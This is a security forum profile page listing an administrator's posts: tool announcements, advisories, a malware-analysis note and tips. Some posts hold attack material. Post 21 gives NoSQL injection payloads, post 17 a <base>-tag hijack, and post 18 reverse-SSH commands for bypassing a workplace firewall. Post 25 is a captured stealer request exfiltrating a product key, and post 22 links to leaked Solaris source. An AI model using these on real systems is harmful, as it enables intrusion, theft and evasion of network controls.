Nytro (Administrators)

Everything posted by Nytro

  1. [h=1]SSLyze: A Fast and Full-Featured SSL Scanner![/h]
by Mayuresh on December 21, 2011

When we wrote the "list of SSL scanners for penetration testers" post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full-featured SSL scanner. It is brought to us by iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL misconfigurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you analyze the configuration of SSL servers and identify misconfigurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings.

[h=2]Features of SSLyze:[/h]
- Insecure renegotiation testing
- Scanning for weak strength ciphers
- Checking for SSLv2, SSLv3 and TLSv1 versions
- Server certificate information dump and basic validation
- Session resumption capabilities and actual resumption rate measurement
- Support for client certificate authentication
- Simultaneous scanning of multiple servers, versions and ciphers

For example, SSLyze can help users identify server configurations vulnerable to THC's recently released SSL DOS attack, by checking the server's support for client-initiated renegotiation. As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems.

All it needs is the following sets of packages:
Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c
Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+

[h=3]Install SSLyze:[/h]
# yum install python26 openssl
# wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip
# unzip sslyze-0.3_src.zip
# cd sslyze-0.3_src

[h=3]SSLyze usage:[/h]
$ python sslyze.py [options] www.target1.com www.target2.com:443

It supports the following options to provide granular control:
- Regular Scan "--regular": Performs a regular scan. It's a shortcut for --sslv2 --sslv3 --tlsv1 --reneg --resum --certinfo=basic.
- OpenSSL Cipher Suites "--sslv2", "--sslv3", "--tlsv1": Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server.
- Session Renegotiation "--reneg": Checks whether the server is vulnerable to insecure renegotiation.
- Session Resumption "--resum": Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077).
- Session Resumption Rate "--resum_rate": Estimates the average rate of successful session resumptions by performing 100 session resumptions.
- Server Certificate "--certinfo=basic": Verifies the server's certificate validity against Mozilla's trusted root store, and prints relevant fields of the certificate.
Additional options providing client certificate support and connection timeout variables are also available.

[h=3]Download SSLyze:[/h]
SSLyze v0.3 - sslyze-0.3_src.zip - Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting

Source: SSLyze: A Fast and Full-Featured SSL Scanner! - PenTestIT
  2. Reversing Microsoft patches to reveal vulnerable code
Harsimran Walia
Computer Security Enthusiast

The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making an undisclosed exploit and for patch verification. The process used herein could be used to create vulnerability-based signatures, which are far better than exploit signatures. A vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition, whereas an exploit-based signature would only cater to one type of input satisfying that vulnerability condition. This paper would try to pinpoint the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched, taken at two different instances: one is the most recent file before patching and the second is after applying the patch, but finding the two files is in itself another problem. Windows now releases two different versions of patches: GDR (General Distribution), which contains only security-related updates, and QFE (Quick Fix Engineering) or LDR (Limited Distribution Release), which has both security-related and functional updates. The problem addressed is that the versions of the two files to be compared should match, that is, either both should be GDR or both LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared, with a version matching the first one, could be extracted from some other vulnerability patch addressing an issue with the same software disclosed just before the vulnerability considered. The process of extraction of files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP.

After obtaining the correct files to be compared, the next step would be to get a binary difference between the files, which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well-illustrated difference between the subroutines in terms of percentage match between them. Subroutines from both files can be viewed in graph mode and compared to find the vulnerability. The change in the code is done to fix that particular vulnerability, which may be removal of a piece of code and addition of another. Another problem arises at this point: compiler optimizations happen every time code is compiled, so if the two files are compiled with different compilers or compiler versions, they would have different compiler optimizations, and that would also show up as a change in code. Simple instruction reordering keeps happening over different releases, which gives rise to another problem: when only the instructions are reordered, it would still show up as changed code. The code change in one of the functions, out of several functions in the file before applying the patch, would be the vulnerable code. From here the knowledge of the reverse engineer comes into play, as to how effectively and fast he can find the vulnerability from the code shown as changed from the previous file. Till now the process used was static analysis, but from now onwards dynamic analysis would be used, as breakpoints could be set at these changed functions and the software run. When a breakpoint is hit we can check in which of the functions user input is being dealt with. All this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures.

Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf
  3. [h=1]libemu – x86 Shellcode Emulation[/h]
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion detection/prevention systems and honeypots.

libemu supports:
- Executing x86 instructions
- Reading x86 binary code
- Register emulation
- Basic FPU emulation
- Shellcode execution
- Shellcode detection
  - Using GetPC heuristics
  - Static analysis
  - Binary backwards traversal
- Win32 API hooking

With libemu one can:
- Detect shellcodes
- Execute the shellcodes
- Profile shellcode behaviour

Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/
Source and info: libemu – x86 Shellcode Emulation
  4. It's useful when you see some uglier syntax and are too lazy to rearrange the code so you can understand it.

(*(void(*)()) SC)();
  5. Manual C#

Great, something in Romanian... Something in English: MEGAUPLOAD - The leading online storage and file delivery service
  6. I'm no expert, but I think you (definitely) had to jailbreak it.
  7. Hello!

I recommend you focus on a single language, at most 2: one programming language - C++ and one scripting/Web language - PHP. But C# is also useful if you want to make something quick and easy. Welcome.
  8. Antisec

Lame email address: h4ck3r@expect-us.net
Contact form without CAPTCHA, probably vulnerable to CRLF injection: Contact
1337 grammar: "Tutorialz"
Pathetic menu made with who knows what junk: "Gooey Menu script"
The design means the kind of tables we made in 9th grade.
In short: crap.
  9. To submit, choose one of these options:

<form id="form" name="send" action="http://www.google.ro/" method="post">
<input type="text" name="2"/>
<input name="buton" id="btn" type="submit" value="Submit" />
</form>
<script>
document.forms[0].submit();
document.send.submit();
document.getElementById("form").submit();
// Or press the button
document.forms[0].buton.click();
document.send.buton.click();
document.getElementById("btn").click();
</script>

To submit after 2 seconds:

<script>
// Function that submits the form
function Dupa2Secunde() {
    document.forms[0].submit();
}
// Call it once, after 2 seconds (setTimeout; setInterval would keep firing every 2 seconds)
setTimeout(Dupa2Secunde, 2000);
</script>
  10. Metasploit on Amazon Kindle
December 18, 2011

Since Nmap and Ruby are working on Kindle (check my previous posts on how I've done that), the next step is Metasploit, of course! Let me tell you immediately: no patches to Metasploit are needed. You can run the full-blown version of Metasploit with Kindle's 256 MB of RAM, but don't expect miracles.

Download
http://ftp.linux.hr/kindle/ruby-1.9.3-p0-kindle-bin.tar.bz2
http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2

Install
Create the opt directory and extract the files there:
mkdir /mnt/us/opt && cd /mnt/us/opt
tar xvjf ruby-1.9.3-p0-kindle.tar.bz2
tar xvjf framework-latest.tar.bz2

Test that you have the following directory structures:
/mnt/us/opt/msf/
/mnt/us/opt/ruby-1.9.3-p0/

export HOME=/mnt/us

and run metasploit:
cd /mnt/us/opt/msf3/
../ruby-1.9.3-p0/bin/ruby msfconsole

I have made a small script in /mnt/us/opt which starts msf, so I don't have to do it every time. It's straightforward:
[INDENT]
#!/bin/sh
export HOME=/mnt/us
cd /mnt/us/opt/msf
../ruby-1.9.3-p0/bin/ruby msfconsole
[/INDENT]

Let me know if it works for you!
Source: Metasploit on Amazon Kindle
  11. [h=1]Remove passwords and restrictions from secured PDF files[/h]
PDFUnlock! is a free web site that removes restrictions from PDF files.
Link: http://www.pdfunlock.com/
I don't know if it works; try it if you need it.
  12. [h=1]Download Firefox 9.0 Final for Linux[/h]
December 20th, 2011, 07:35 GMT · By Marius Nestor

Mozilla unofficially released last evening, December 19th, the highly anticipated Mozilla Firefox 9.0 web browser for Linux, Mac OS X and Windows operating systems. There's no official announcement yet, but the binary and source archives of the final version of Mozilla Firefox 9.0 were made available for download on the official FTP site of the Mozilla company.

Highlights of Mozilla Firefox 9.0:
· Added Type Inference, radically improving JavaScript performance;
· Do Not Track status can now be queried via JavaScript;
· font-stretch support was added;
· text-overflow support was improved;
· HTML5, CSS, and MathML support was improved;
· Various stability issues were fixed.

Download Firefox 9.0 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons!
Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-8-20864.shtml
Source: Download Firefox 9.0 Final for Linux - Softpedia
  13. [h=1]Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS)[/h]
Jeff Darcy has written a while back about the (lack of) security in NoSQL databases. Unfortunately things haven't changed much, and if you check the NoSQL + Node.js applications I've posted lately you'll notice that some of them are completely ignoring security. And there are some people realizing the risks and starting to express their concerns:

"Playing with MongoDB lately, I'm getting scared. Because I'm seeing some really bad practices out there. Seeing it in live code. In tutorials."

Bryan Sullivan (Senior Security Researcher, Adobe Secure Software Engineering Team) has published a paper (PDF) explaining some of the possible server-side JavaScript injection attacks and the risks the apps and the data are exposed to. Teaser: he can do pretty much everything.

"It should be noted that exploitation of server-side JavaScript injection vulnerabilities is more like that of SQL injection than of cross-site scripting. SSJS injection does not require any social engineering of an intermediate victim user the way that reflected XSS or DOM-based XSS do; instead, the attacker can attack the application directly with arbitrarily created HTTP requests. Because of this, defenses against SSJS injection are also similar to SQL injection defenses:
- Avoid creating "ad-hoc" JavaScript commands by concatenating script with user input.
- Validate user input used in SSJS commands with regular expressions.
- Avoid use of the JavaScript eval command. In particular, when parsing JSON input, use a safer alternative such as JSON.parse."

Remember there's no such thing as security through obscurity.
Source: Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS) • myNoSQL
  14. JPC is the fast pure Java™ x86 PC emulator
Use JPC to boot virtual computers right here in your browser....

JPC creates a virtual computer upon which you can install your favorite operating system in a safe, flexible and powerful way. It aims to give you complete control over your favorite PC software's execution environment, whatever your real hardware or operating system, and JPC's multi-layered security makes it the safest solution for running the most dangerous software in quarantine - ideal for protecting your machine from malicious or unstable software.

Read more about JPC - since its launch at JavaOne 2007, JPC can now boot many more operating systems (including graphical Linuxes) and it's much faster.

Download: http://jpc.sourceforge.net/download_download.html
Source: JPC
  15. [h=1]Virtual Machine Security - VMware Security Hardening[/h]
By Irfan Shakeel

Virtual machines are very common in the enterprise and even for home users; the most common virtual machines are VMware and VirtualBox, and in both security is an essential part. The security of a virtual machine is as important as the security of the host machine. Different hardening tips are available for virtual machines (VMware), and in this article we will discuss the basic security tips for VMware.

Virtualization is complex and there are many moving parts. I cannot speak to all the details of hardening a VMware environment, but I can speak to the minimum things to consider when installing or maintaining a VMware environment. For more advice, look at these documents:
- vSphere 4.0 Security Hardening Guide
- Security Configuration Benchmarks for VMware ESX 4
- PCI DSS Virtualization Guidelines
- A Guide to Virtualization Hardening Guides

[h=3]A Typical ESX Environment[/h]
A typical ESX environment will have one or more ESX servers connected to a shared storage system such as a Fibre Channel or iSCSI SAN. Each ESX server will have one or more guest operating systems, each with VMware Tools and a myriad of applications installed. This can be seen in the figure below:

In this environment there are three major areas of concern: the storage system, the ESX servers, and the guest operating systems.

[h=3]Storage Systems[/h]
Four things to think about with storage systems are data availability, traffic isolation, the security levels of the ESX servers sharing the storage systems, and which ESX servers are allowed to see which data sets.

[h=4]Data Availability[/h]
Whatever storage system is used, Fibre Channel or iSCSI, ensure there are multiple data paths between the storage system and the ESX servers. This includes dual controllers on the SAN, dual switches, redundant power sources for the SAN, and dual host bus adapters (HBAs) on the ESX server. It is not enough to have a single HBA with dual ports; two HBAs are necessary. Before the system goes into production, testing should be done to ensure a single device failure does not prevent the ESX server from accessing the data.

[h=4]Traffic Isolation[/h]
Traffic isolation is of particular concern in iSCSI systems because they use the same basic infrastructure as a standard network. All iSCSI traffic should be segmented from the rest of the network traffic to prevent an attacker from sniffing the iSCSI data. I am not a fan of using VLANs to segment traffic of differing security levels and always recommend physically segmenting iSCSI traffic from the rest of the network.

[h=4]Shared Storage for ESX Servers with Differing Security Levels[/h]
ESX servers in differing security levels are configured and maintained differently. An ESX server set up as a lab environment is not going to be hardened to the same level as an ESX server holding the company's production systems, and those two ESX servers should not share the same storage. An attacker who gained access to the weaker ESX server could use it to attempt to gain access to the production data on the shared storage system.

[h=4]Share Data Volumes with the Appropriate ESX Servers[/h]
On a typical SAN, multiple data volumes are configured and each one is assigned a SCSI logical unit number (LUN), which is used to uniquely identify that volume. The SAN can then be configured to only allow specific HBAs to access specific LUNs. As an example, in a group of ESX servers only two of those servers may need access to the LUN that holds the HR data; the SAN should be configured so only the HBAs in those ESX servers have access to the LUN with HR data.

[h=3]Conclusion[/h]
As stated earlier, there are three major areas of concern with a production VMware environment: the storage system, the ESX servers, and the guest operating systems. I will discuss the latter two in upcoming blog entries. For now, remember to configure and test multiple paths to the data on the storage system, to isolate iSCSI traffic from the rest of the network, to keep ESX servers of differing security levels from sharing the same storage system, and to only share data sets with the appropriate ESX servers.

About the Author
Stephen has over ten years of experience in the information technology field, working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional (CISSP), Offensive Security Certified Professional (OSCP), and GIAC Penetration Tester (GPEN).
Source: Virtual Machine Security - VMware Security Hardening | Ethical Hacking-Your Way To The World Of IT Security
  16. Silly PoCs continue: X-Frame-Options give you less than expected
From: Michal Zalewski <lcamtuf () coredump cx>
Date: Fri, 16 Dec 2011 11:21:49 -0800

[ Resubmitting - I think the original post did not go through last week, but some of the responses did, so probably an accident. ]

---

I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously.

The PoC I posted here earlier this week (Beaver Peak Banking and BBQ) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/).

Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed:

http://lcamtuf.coredump.cx/clickit/

The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible <iframe>, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site).

While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly.

/mz
Source: Bugtraq: silly PoCs continue: X-Frame-Options give you less than expected
  17. <BASE> tag used for hijacking external resources (XSS)
From: Bouke van Laethem
Date: Thu, 15 Dec 2011 23:53:26 +0100

I report this here because I could not find any other reference to this issue.

VULNERABLE: Chrome, Firefox and Safari.
NOT VULNERABLE: IE8 or IE9.
(Above is as far as I could tell: things are moving fast nowadays in browser land)

ISSUE: The <base> tag is parsed outside of <head></head>. This can lead to the base being reset, both before and after the <base> tag being injected, depending on browser types and versions. As a result, images and javascript can be loaded from an attacker's domain, and forms and hyperlinks point to the attacker's domain. An example can be found on http://avuko.net, but it is simple enough to reproduce: just put a <base href="http://attackerdomain"> somewhere in your HTML (the closer to <head> the better). Tested with overriding <img>, <a>, <script> & <form>; would probably work on other external references too.

FIX/WORK-AROUND: make sure all paths are absolute.

REFERENCES:
http://www.w3.org/TR/html4/struct/links.html#h-12.4
http://avuko.net

--
Be strict when sending and tolerant when receiving. [RFC 1958, 3.9]
Source: Bugtraq: <BASE> tag used for hijacking external resources (XSS)
  18. Bypassing NAT with client to client SSH connections
Posted: December 19, 2011 in Guides

Okay, well I know it's been entirely too long since I've written anything here, and for those of you who know me personally you know I've had a very hectic schedule of late. Sorry for the delay in posting; also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I'm hoping to have at least one of them up after the holidays, but no promises. So to tide you over for a little bit, and to get a new post up here, I'm going to discuss something that a lot of people ask about on Ubuntu Forums.

It is against Ubuntu Forums policy to instruct people how to bypass the security of a network they do not own. This, however, is my personal blog and I will instruct whatever I want. That being said, if you do this at work and get fired it's your fault; most sysadmins will frown on this, and yes, they will catch you.

This is not really a new trick, but it will bypass NAT and allow you to have an always-on SSH connection to an endpoint behind a NAT router (with no ports forwarded). This requires three systems: the endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to SSH from (presumably your home machine or another system that you control).

Note: For the purposes of this guide the following IPs are used as a point of reference.
Middleman: 192.168.0.15
Endpoint Behind Firewall: 172.16.128.4
Machine that you're SSH'ing from: 192.168.0.14

So here we go.

Setting up the Middle Man

First things first, we need to install an openssh-server on our middleman and configure it as a gateway.
Note: This is done on Ubuntu; change commands appropriately for your operating environment.

sudo apt-get install openssh-server

Now we want to edit /etc/ssh/sshd_config and add the following lines.

GatewayPorts Yes
TCPKeepAlive Yes

This will keep our connections alive and allow us to tunnel through this system.

Creating a Reverse Connection From the Endpoint

Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I'm lazy so I didn't generate keys here.

ssh -R 31337:localhost:22 dangertux@192.168.0.15

What this does is create a reverse connection and tunnel to 192.168.0.15.

Connect From Your Machine

Now we connect to the middleman server from our machine.

ssh -p 31337 dangertux@192.168.0.15

Note: the password you are prompted for will be the password of the user on the machine behind the firewall.

There you go, an always-on SSH client-to-client connection that bypasses NAT routing. Again, a friendly warning: a sysop will not take "DT told me to" as an excuse; besides, I didn't tell you to, I told you how.
Source: SSH Hacks : Bypassing NAT with client to client SSH connections
  19. [h=3]FindBugs v.2.0 - Find Bugs in Java Programs[/h]
[h=2]Sunday, December 18, 2011 (d3v1l)[/h]
A static analysis tool to find bugs in Java programs. FindBugs is an open source program created by Bill Pugh and David Hovemeyer which looks for bugs in Java code. It uses static analysis to identify hundreds of different potential types of errors in Java programs. FindBugs operates on Java bytecode, rather than source code. The software is distributed as a stand-alone GUI application. There are also plug-ins available for Eclipse, NetBeans, IntelliJ IDEA, and Hudson.

First Look: FindBugs 2.0
Download: http://findbugs.sourceforge.net
Source: Security-Shell: FindBugs v.2.0 - Find Bugs in Java Programs
  20. HTML5 web security
December 6th, 2011

Document Name: HTML5_Web_Security_v1.0.docx
Version: v1.0
Author: Michael Schmidt, Compass Security AG
Reviewer: Thomas Röthlisberger, Compass Security AG
Date of Delivery: December 6th, 2011
Classification: Article

Overview of HTML5 web security by Michael Schmidt [michael.schmidt-@-csnc.ch], reviewed by Thomas Röthlisberger [thomas.roethlisberger-@-csnc.ch]

This article is an extract of the master thesis written by Michael Schmidt. The security-relevant aspects of HTML5 that were considered in this thesis are covered in the subsequent document. It needs to be considered that the content of this document was released in May 2011. Compass Security makes regular updates to its HTML5 security know-how and provides additional information. Please visit Compass Security AG - Switzerland or contact us for the most current version.

Download: http://media.hacking-lab.com/hlnews/HTML5_Web_Security_v1.0.pdf
  21. Time-Based Blind NoSQL Injection
Authored by Felipe Aragon | Site syhunt.com
Posted Dec 19, 2011

This is a brief write-up discussing time-based NoSQL injection attacks using JavaScript.

Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities

In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-side JavaScript injection vulnerabilities in web applications using MongoDB and other NoSQL database engines. He demonstrated how they could be used to perform Denial of Service, File System, Remote Command Execution, and many other attacks, including the easy extraction of the entire contents of the NoSQL database -- a blind NoSQL injection attack (paper here at https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf).

We not only confirmed the published data about the NoSQL injection vulnerabilities, but also discovered that the MongoDB shell supports a sleep() function, which makes time-based detection of vulnerable web applications possible. It is also possible to inject custom sleep code, a technique that may be used to spot injection vulnerabilities in web applications using server-side JavaScript execution. This is not restricted to MongoDB. Below you can find two examples of NoSQL injection vulnerabilities in PHP that could be spotted using these techniques.

Example 1: NoSQL Injection Vulnerability in PHP

The following requests would make this (or a similar) vulnerable web application sleep for 10 seconds:
vulnerable.php?msg=1';sleep(10000);var%20foo='bar
The MongoDB sleep() function works with milliseconds.

Alternative technique using custom sleep code:
vulnerable.php?msg=1';var%20d%20=%20new%20Date();%20var%20cd%20=%20null;%20do%20{%20cd%20=%20new%20Date();%20}%20while(cd-d%20<%2010000);var%20foo='bar

<?php
$mongo = new Mongo();
$db = $mongo->demo;
$id = $_GET['id'];
// untrusted input concatenated straight into server-side JavaScript
$js = "function() { var id = '$id'; SOME CODE... }";
$response = $db->execute($js);
...
?>

Example 2: NoSQL Injection Vulnerability in PHP

<?php
$mongo = new Mongo();
$db = $mongo->demo;
$year = $_GET['year'];
$collection = $db->demo;
// untrusted input concatenated into a $where JavaScript function
$query = 'function() {var search_year = \'' . $year . '\';' .
         'return this.publicationYear == search_year || ' .
         ' this.filmingYear == search_year || ' .
         ' this.recordingYear == search_year;}';
$cursor = $collection->find(array('$where' => $query));
...
?>

Example 3: Sleep in JavaScript

var date = new Date();
var curDate = null;
do { curDate = new Date(); } while(curDate-date < 10000); // delay time (ms)

Solution
Always validate user input used in server-side JavaScript commands.

Article by Felipe Aragon. Originally published at http://www.syhunt.com/?n=Articles.NoSQLInjection

---
Copyright © 2010 Syhunt Security
Disclaimer: The information in this article is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this article.
Source: Time-Based Blind NoSQL Injection - Packet Storm
  22. [h=1]Oracle Solaris 11 Kernel Source Leaked[/h]
December 19th, 2011, 14:00 GMT · By Marius Nestor

As Phoronix announced a couple of minutes ago, it appears that a snapshot of the kernel source code for Oracle's Solaris 11 operating system has been leaked on major torrent and file hosting sites.

Searching "solaris11.tar.bz2" on Google, Softpedia can also confirm that the bzip2 archive of about 104 MB contains the source code of Oracle Solaris 11's kernel. Being a closed source operating system, Oracle is probably trying right now to delete the leaked Solaris 11 kernel archive from the aforementioned sites.

The Oracle Corporation announced the Oracle Solaris 11 cloud operating system on November 9th, supporting the security, scalability and performance requirements of cloud-based deployments. Oracle Solaris 11 brings features like the ZFS filesystem, virtualization capabilities, comprehensive management, "secure by default" features, cloud-scale life cycle management, and SPARC and x86 certification.

Download Oracle Solaris 11 right now from Softpedia.
Mirror: Download solaris11.tar.bz2 for free on uploading.com
Source: Oracle Solaris 11 Kernel Source Leaked - Softpedia
  23. [h=1]Analyzing malware using Sysinternals' VMMap[/h]
Posted by Chief Banana on December 19, 2011

In May 2011, Sysinternals released a new tool called 'vmmap'. According to the website: 'VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process's committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map'.

While analyzing a piece of malware for a chapter in a book, I discovered the great usage of this tool. I had already identified that a suspicious connection was using the PID 1040. Investigating the processes around this PID, it became clear that this PID belonged to one of the 'svchost' processes. Another interesting file that was used by this process was called '6to4ex.dll'.

Opening VMMap from a forensic CD-ROM, the tool asked for the starting process. In this case I selected the option 'SVCHOST' with the PID 1040. Next, the breakdown of this process's committed virtual memory types and used files is visible. Under the svchost process overview, the '6to4ex.dll' file was also shown. Selecting this file and using the shortcut 'CTRL+T', which activates the strings view command, very interesting strings about this file became visible.

The interesting strings about the malware used and its capabilities:
· '%s\shell\open\command
· Gh0st Update
· E:\gh0st\server\sys\i368\RESSDT.pdb
· \??\RESSDTDOS
· ?AVCScreenmanager
· ?AVCScreenSpy
· ?AVCKeyboardmanager
· ?AVCShellmanager
· ?AVCAudio
· ?AVCAudiomanager
· SetWindowsHookExA
· CVideocap
· Global\Gh0st %d
· \cmd.exe

By searching for more details around the term 'Gh0st' and backdoor, it became clear that this might be a Chinese Remote Access Tool (RAT) that is commonly known to be used in targeted attacks. Features of this RAT are: capturing audio/video/keystrokes, remote shell, remote command, file manager, spying on the screen and many more. Definitely VMMap will be part of my malware IR kit.
Source: Analyzing malware using Sysinternals' VMMap | securitybananas.com
  24. NoScript detection with CSS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Test</title>
</head>
<body>
<!-- The frame starts 180px wide; if scripting is allowed, it is widened to 400px. -->
<iframe src="detection.html" width="180" id="testframe"></iframe>
<script type="text/javascript">
document.getElementById("testframe").style.width = "400px";
</script>
</body>
</html>

detection.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>detection</title>
<style type="text/css">
/* Default: the parent's script ran, so the frame is 400px wide. */
.active { display:none; }
.notactive { display:block; }
/* If the frame is still narrow (at most 200px), the parent's script never ran. */
@media screen and (max-width: 200px) {
.active { display:block; }
.notactive { display:none; }
}
</style>
</head>
<body>
<div class="active">Noscript is active</div>
<div class="notactive">Noscript is not active</div>
</body>
</html>

Source: Test Tricky...
  25. GET /steler/index.php?action=add&a=4&c=JOHN-66E06C37B1&u=-&l=Microsoft Windows XP Professional&p=VGBRV-X2DDM-JYDFW-22MQW-3G39Y HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.cruciatii.in
Connection: Keep-Alive

@alexbest Permanent ban. If you want to talk to him: cs.alexbest @ IM
He's from Stefanesti, probably from the countryside, so well...
So the program is actually a Firefox stealer, and probably of other things too.